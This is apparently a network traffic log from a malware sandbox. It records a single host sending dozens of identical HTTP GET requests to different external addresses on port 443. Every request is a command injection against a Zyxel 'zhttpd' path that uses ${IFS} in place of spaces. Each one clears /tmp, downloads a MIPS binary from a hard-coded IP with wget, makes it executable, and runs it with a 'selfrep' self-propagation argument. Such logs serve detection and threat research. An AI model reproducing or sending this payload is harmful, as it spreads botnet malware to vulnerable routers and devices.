                                      Jan 19, 2024 17:29:39.917603970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6263192.168.2.1434628177.160.167.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917646885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6264192.168.2.1444228146.60.66.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917702913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6265192.168.2.1460490119.249.161.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917754889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6266192.168.2.1451758210.208.193.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917800903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6267192.168.2.14608729.245.35.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917836905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6268192.168.2.143341084.90.33.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917867899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6269192.168.2.1438592206.59.186.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917911053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6270192.168.2.1432986205.96.185.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917928934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6271192.168.2.1454892107.101.49.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918010950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6272192.168.2.145228094.23.167.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918059111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6273192.168.2.145176014.135.182.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918107033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6274192.168.2.1458924191.147.22.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918157101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6275192.168.2.144740681.153.16.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918191910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6276192.168.2.143477292.97.167.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918230057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6277192.168.2.145034690.219.84.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918272972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6278192.168.2.1448848142.176.73.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918315887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6279192.168.2.1458034152.159.215.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918358088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6280192.168.2.1440740107.196.55.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918406963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6281192.168.2.145653625.235.31.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918466091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6282192.168.2.1432996141.149.214.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918514967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6283192.168.2.144018639.241.154.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918539047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6284192.168.2.143728693.183.156.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918585062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6285192.168.2.144451886.161.47.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918618917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6286192.168.2.145267299.72.118.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918652058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6287192.168.2.1438262126.61.155.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918677092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6288192.168.2.144053271.117.82.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918730021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6289192.168.2.1447502136.243.230.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918776035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6290192.168.2.1455498137.143.19.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918826103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6291192.168.2.1456584152.80.131.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918883085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6292192.168.2.143379220.69.108.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918936968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6293192.168.2.1451230122.251.178.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918977976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6294192.168.2.1443758191.98.252.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.918999910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6295192.168.2.1443606108.61.69.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.919075012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6296192.168.2.145452092.197.115.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.919106007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6297192.168.2.1459676138.131.35.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.919145107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6298192.168.2.144929612.152.24.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.919193029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6299192.168.2.1449040216.41.51.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.919218063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6300192.168.2.1433828144.23.197.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.919275045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6301192.168.2.143454694.209.178.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.919312000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6302192.168.2.1444838147.179.123.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.919364929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6303192.168.2.143821686.253.1.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936367989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6304192.168.2.1447050130.11.198.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936409950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6305192.168.2.1434312192.182.219.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936460972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6306192.168.2.1455364177.128.237.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936497927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6307192.168.2.1438176104.166.11.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936542034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6308192.168.2.1445654190.41.154.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936559916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6309192.168.2.144417062.244.55.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936636925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6310192.168.2.1435530138.47.254.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936650991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6311192.168.2.1460798179.61.75.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936676025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6312192.168.2.1443964199.252.226.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936745882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6313192.168.2.1449682175.122.98.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936748028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6314192.168.2.1437656198.112.149.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936770916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6315192.168.2.1460010156.141.143.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936832905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6316192.168.2.1452562200.44.122.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936857939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6317192.168.2.145833270.29.3.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936882973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6318192.168.2.1452324172.231.58.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936942101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6319192.168.2.1445904168.30.114.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.936975956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6320192.168.2.145211835.176.255.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937031984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6321192.168.2.143395618.15.255.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937053919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6322192.168.2.143870074.46.115.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937100887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6323192.168.2.1434228114.212.146.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937128067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6324192.168.2.144152043.113.110.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937165976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6325192.168.2.1445002107.5.75.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937233925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6326192.168.2.145693434.0.62.140443
                                      TimestampBytes transferredDirectionData
